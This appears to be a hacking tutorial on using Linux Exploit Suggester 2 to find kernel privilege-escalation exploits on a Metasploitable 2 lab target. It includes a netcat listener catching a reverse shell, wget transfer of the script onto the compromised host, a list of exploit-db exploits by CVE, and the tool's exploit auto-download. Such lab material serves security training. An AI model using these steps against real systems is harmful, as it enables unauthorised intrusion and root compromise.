How to Find Exploits & Get Root with Linux Exploit Suggester

Privilege escalation is one of the essential skills a hacker can have and often separates the newbies from the pros. With a continually changing landscape and a plethora of exploits out there, it can be a problematic aspect of any attack. Luckily, some tools can help expedite the process. Linux Exploit Suggester is just one of many to help you get root.

Privilege escalation is the act of gaining access to the privileges of another user on the system. It comes in two flavors: horizontal and vertical privilege escalation.

Horizontal privilege escalation is when an attacker gains access to another user account, typically with the same status and permissions. It can allow them access to additional systems or data but isn't quite as serious as its vertical cousin. Vertical privilege escalation is when an attacker obtains access to an account with elevated privileges, such as that of a system administrator.

Don't Miss: How to Get Root with Metasploit's Local Exploit Suggester

Privilege escalation, especially the vertical kind, is vital for the attacker because it allows them to do things an average user wouldn't be able to. Unless the system is poorly configured, standard users can't usually execute malicious code or configure the system in dramatic ways that would benefit an attacker. That is why privilege escalation is vital for the complete compromise of a target.

Step 1: The Setup & Initial Compromise

To get started, we're using Metasploitable 2 as the target and Kali Linux as our local machine. You can use a similar setup. When ready, we need to download Linux Exploit Suggester from GitHub.

Let's assume that the target has restricted access to the internet, so we'll need to have it on our local machine first and transfer it over to the target later. We can use wget to download the script directly from the terminal:

~# wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl

--2020-02-18 12:15:58--  https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24780 (24K) [text/plain]
Saving to: ‘linux-exploit-suggester-2.pl’

linux-exploit-suggester-2.pl                          100%[======================================================================================================================>]  24.20K  --.-KB/s    in 0.03s

2020-02-18 12:15:58 (718 KB/s) - ‘linux-exploit-suggester-2.pl’ saved [24780/24780]

Now we'll need to compromise the target and get shell access. Command injection is always a fun option. Then, once we catch the incoming connection, we can verify that we are the www-data user with the id command:

~# nc -lvnp 4321

listening on [any] 4321 ...
connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 36302
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

From here, we will want to upgrade to a fully interactive TTY shell so we have more control and can use tab completion, command history, etc. Once we have upgraded our shell, we can navigate to a world-writable directory so we can receive and eventually run the tool:

www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /dev/shm

Step 2: Transfer the Script to the Target

Back on our local machine, let's rename the script to something shorter:

~# mv linux-exploit-suggester-2.pl les2.pl

Now we can serve the script with Python's SimpleHTTPServer module — use the -m switch to specify the module:

~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

That will serve any content in the directory over HTTP on port 8000.

Back on the target, we can use wget again to retrieve the script from our local machine:

www-data@metasploitable:/dev/shm$ wget http://10.10.0.1:8000/les2.pl

--13:43:17--  http://10.10.0.1:8000/les2.pl
           => `les2.pl'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24,780 (24K) [text/x-perl]

100%[=========================================================================================================================================================================>] 24,780        --.--K/s

13:43:18 (70.47 MB/s) - `les2.pl' saved [24780/24780]

Once that completes, we can kill the Python server. Now we can take a look at the current permissions of our script that we just transferred over:

www-data@metasploitable:/dev/shm$ ls -la

total 28
drwxrwxrwt  2 root     root        60 Jun 19 13:43 .
drwxr-xr-x 13 root     root     13480 Jun 19 13:28 ..
-rw-r--r--  1 www-data www-data 24780 Feb 18 2020 les2.pl

We can see that it's read-only at this point, so use the chmod command to make it executable:

www-data@metasploitable:/dev/shm$ chmod +x les2.pl

Finally, we're all set to run the script.

Step 3: Run Linux Exploit Suggester

Since we made it executable, we can use the dot-slash to run Linux Exploit Suggester. Use the -h flag to see the help menu and usage example:

www-data@metasploitable:/dev/shm$ ./les2.pl -h

  #############################
    Linux Exploit Suggester 2
  #############################

  Usage: ./les2.pl [-h] [-k kernel] [-d]

  [-h] Help (this message)
  [-k] Kernel number (eg. 2.6.28)
  [-d] Open exploit download menu

  You can also provide a partial kernel version (eg. 2.4)
  to see all exploits available.

The most basic way to use the tool is running it without any options:

www-data@metasploitable:/dev/shm$ ./les2.pl

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6.24
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] can_bcm
      CVE-2010-2959
      Source: http://www.exploit-db.com/exploits/14814
  [3] dirty_cow
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [4] do_pages_move
      Alt: sieve       CVE-2010-0415
      Source: Spenders Enlightenment
  [5] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [6] half_nelson1
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [7] half_nelson2
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [8] half_nelson3
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [9] msr
      CVE-2013-0268
      Source: http://www.exploit-db.com/exploits/27297
  [10] pipe.c_32bit
      CVE-2009-3547
      Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
  [11] pktcdvd
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [12] reiserfs
      CVE-2010-1146
      Source: http://www.exploit-db.com/exploits/12130
  [13] sock_sendpage
      Alt: wunderbar_emporium       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9435
  [14] sock_sendpage2
      Alt: proto_ops       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9436
  [15] video4linux
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024
  [16] vmsplice1
      Alt: jessica biel       CVE-2008-0600
      Source: http://www.exploit-db.com/exploits/5092
  [17] vmsplice2
      Alt: diane_lane       CVE-2008-0600
      Source: http://www.exploit-db.com/exploits/5093

Linux Exploit Suggester works by grabbing the kernel version and comparing it to a list of possible exploits. Above, we can see it returned a handful of potential exploits, listing the respective name, CVE number, and link to the source.

We can also use the -k switch to specify the kernel version manually. Let's confirm the kernel number with the uname -r command:

www-data@metasploitable:/dev/shm$ uname -r

2.6.24-16-server

Instead of using the exact version number, we can truncate it to 2.6 since systems can often be vulnerable to slightly older exploits as well:

www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language (2.6.0)
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] can_bcm (2.6.18)
      CVE-2010-2959
      Source: http://www.exploit-db.com/exploits/14814
  [3] caps_to_root (2.6.34)
      CVE-n/a
      Source: http://www.exploit-db.com/exploits/15916
  [4] dirty_cow (2.6.22)
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [5] do_pages_move (2.6.18)
      Alt: sieve       CVE-2010-0415
      Source: Spenders Enlightenment
  [6] elfcd (2.6.12)
  [7] exit_notify (2.6.25)
      Source: http://www.exploit-db.com/exploits/8369
  [8] exp.sh (2.6.9)
  [9] exploit_x (2.6.22)
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [10] ftrex (2.6.11)
      CVE-2008-4210
      Source: http://www.exploit-db.com/exploits/6851
  [11] h00lyshit (2.6.8)
      CVE-2006-3626
      Source: http://www.exploit-db.com/exploits/2013
  [12] half_nelson1 (2.6.0)
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [13] half_nelson2 (2.6.0)
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [14] half_nelson3 (2.6.0)
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [15] kdump (2.6.13)
  [16] krad (2.6.5)
  [17] krad3 (2.6.5)
      Source: http://exploit-db.com/exploits/1397
  [18] local26 (2.6.13)
  [19] memodipper (2.6.39)
      CVE-2012-0056
      Source: http://www.exploit-db.com/exploits/18411
  [20] msr (2.6.18)
      CVE-2013-0268
      Source: http://www.exploit-db.com/exploits/27297
  [21] newsmp (2.6)
  [22] ong_bak (2.6.5)
  [23] pipe.c_32bit (2.6.15)
      CVE-2009-3547
      Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
  [24] pktcdvd (2.6.0)
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [25] prctl (2.6.13)
      Source: http://www.exploit-db.com/exploits/2004
  [26] prctl2 (2.6.13)
      Source: http://www.exploit-db.com/exploits/2005
  [27] prctl3 (2.6.13)
      Source: http://www.exploit-db.com/exploits/2006
  [28] prctl4 (2.6.13)
      Source: http://www.exploit-db.com/exploits/2011
  [29] ptrace_kmod2 (2.6.26)
      Alt: ia32syscall,robert_you_suck       CVE-2010-3301
      Source: http://www.exploit-db.com/exploits/15023
  [30] pwned (2.6.11)
  [31] py2 (2.6.9)
  [32] raptor_prctl (2.6.13)
      CVE-2006-2451
      Source: http://www.exploit-db.com/exploits/2031
  [33] rawmodePTY (2.6.31)
      CVE-2014-0196
      Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
  [34] rds (2.6.30)
      CVE-2010-3904
      Source: http://www.exploit-db.com/exploits/15285
  [35] reiserfs (2.6.18)
      CVE-2010-1146
      Source: http://www.exploit-db.com/exploits/12130
  [36] sctp (2.6.26)
      CVE-2008-4113
  [37] semtex (2.6.37)
      CVE-2013-2094
      Source: http://www.exploit-db.com/exploits/25444
  [38] sock_sendpage (2.6.0)
      Alt: wunderbar_emporium       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9435
  [39] sock_sendpage2 (2.6.0)
      Alt: proto_ops       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9436
  [40] stackgrow2 (2.6.10)
  [41] udev (2.6.25)
      Alt: udev <1.4.1       CVE-2009-1185
      Source: http://www.exploit-db.com/exploits/8478
  [42] udp_sendmsg_32bit (2.6.1)
      CVE-2009-2698
      Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
  [43] uselib24 (2.6.10)
  [44] vconsole (2.6)
      CVE-2009-1046
  [45] video4linux (2.6.0)
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024
  [46] vmsplice1 (2.6.17)
      Alt: jessica biel       CVE-2008-0600
      Source: http://www.exploit-db.com/exploits/5092
  [47] vmsplice2 (2.6.23)
      Alt: diane_lane       CVE-2008-0600
      Source: http://www.exploit-db.com/exploits/5093

We can see that it gave us a much larger pool of possible exploits.

The last option Linux Exploit Suggester provides is the ability to automatically download exploit scripts for any matches it finds. Use the -d flag to enable the option:

www-data@metasploitable:/dev/shm$ ./les2.pl -k 2.6 -d

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language (2.6.0)
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] can_bcm (2.6.18)
      CVE-2010-2959
      Source: http://www.exploit-db.com/exploits/14814
  [3] caps_to_root (2.6.34)
      CVE-n/a
      Source: http://www.exploit-db.com/exploits/15916
  [4] dirty_cow (2.6.22)
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [5] do_pages_move (2.6.18)
      Alt: sieve       CVE-2010-0415
      Source: Spenders Enlightenment
  [6] elfcd (2.6.12)
  [7] exit_notify (2.6.25)
      Source: http://www.exploit-db.com/exploits/8369
  [8] exp.sh (2.6.9)
  [9] exploit_x (2.6.22)
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [10] ftrex (2.6.11)
      CVE-2008-4210
      Source: http://www.exploit-db.com/exploits/6851
  [11] h00lyshit (2.6.8)
      CVE-2006-3626
      Source: http://www.exploit-db.com/exploits/2013
  [12] half_nelson1 (2.6.0)
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [13] half_nelson2 (2.6.0)
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [14] half_nelson3 (2.6.0)
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [15] kdump (2.6.13)
  [16] krad (2.6.5)
  [17] krad3 (2.6.5)
      Source: http://exploit-db.com/exploits/1397
  [18] local26 (2.6.13)
  [19] memodipper (2.6.39)
      CVE-2012-0056
      Source: http://www.exploit-db.com/exploits/18411
  [20] msr (2.6.18)
      CVE-2013-0268
      Source: http://www.exploit-db.com/exploits/27297
  [21] newsmp (2.6)
  [22] ong_bak (2.6.5)
  [23] pipe.c_32bit (2.6.15)
      CVE-2009-3547
      Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
  [24] pktcdvd (2.6.0)
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [25] prctl (2.6.13)
      Source: http://www.exploit-db.com/exploits/2004
  [26] prctl2 (2.6.13)
      Source: http://www.exploit-db.com/exploits/2005
  [27] prctl3 (2.6.13)
      Source: http://www.exploit-db.com/exploits/2006
  [28] prctl4 (2.6.13)
      Source: http://www.exploit-db.com/exploits/2011
  [29] ptrace_kmod2 (2.6.26)
      Alt: ia32syscall,robert_you_suck       CVE-2010-3301
      Source: http://www.exploit-db.com/exploits/15023
  [30] pwned (2.6.11)
  [31] py2 (2.6.9)
  [32] raptor_prctl (2.6.13)
      CVE-2006-2451
      Source: http://www.exploit-db.com/exploits/2031
  [33] rawmodePTY (2.6.31)
      CVE-2014-0196
      Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
  [34] rds (2.6.30)
      CVE-2010-3904
      Source: http://www.exploit-db.com/exploits/15285
  [35] reiserfs (2.6.18)
      CVE-2010-1146
      Source: http://www.exploit-db.com/exploits/12130
  [36] sctp (2.6.26)
      CVE-2008-4113
  [37] semtex (2.6.37)
      CVE-2013-2094
      Source: http://www.exploit-db.com/exploits/25444
  [38] sock_sendpage (2.6.0)
      Alt: wunderbar_emporium       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9435
  [39] sock_sendpage2 (2.6.0)
      Alt: proto_ops       CVE-2009-2692
      Source: http://www.exploit-db.com/exploits/9436
  [40] stackgrow2 (2.6.10)
  [41] udev (2.6.25)
      Alt: udev <1.4.1       CVE-2009-1185
      Source: http://www.exploit-db.com/exploits/8478
  [42] udp_sendmsg_32bit (2.6.1)
      CVE-2009-2698
      Source: http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c
  [43] uselib24 (2.6.10)
  [44] vconsole (2.6)
      CVE-2009-1046
  [45] video4linux (2.6.0)
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024
  [46] vmsplice1 (2.6.17)
      Alt: jessica biel       CVE-2008-0600
      Source: http://www.exploit-db.com/exploits/5092
  [47] vmsplice2 (2.6.23)
      Alt: diane_lane       CVE-2008-0600
      Source: http://www.exploit-db.com/exploits/5093

  Exploit Download
  (Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
  Select exploits to download:

After it determines the potential exploits, we are presented with an option to download either all scripts or individual scripts. For example, if we wanted to download the udev exploit, we would simply input its respective number ID:

Exploit Download
  (Download all: 'a' / Individually: '2,4,5' / Exit: ^c)
  Select exploits to download: 41

  Downloading https://www.exploit-db.com/raw/8478 -> exploit_udev

Keep in mind, the feature requires an active internet connection, so if access is restricted in any way, it won't work. Still, Linux Exploit Suggester makes it extremely easy to get the exploit script right on the target. From this point, it's just a matter of escalating privileges to get root.

Wrapping Up

In this tutorial, we learned about privilege escalation and a tool called Linux Exploit Suggester. We began with an initial compromise and transferred the script to the target. We were then able to run it and cover a few of its usage options to discover possible exploits that could be used to get root. Privilege escalation is an integral part of any hacker's methodology, and Linux Exploit Suggester is just one tool to aid in that goal.

Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.

Cover image by Pedro Sandrini/Pexels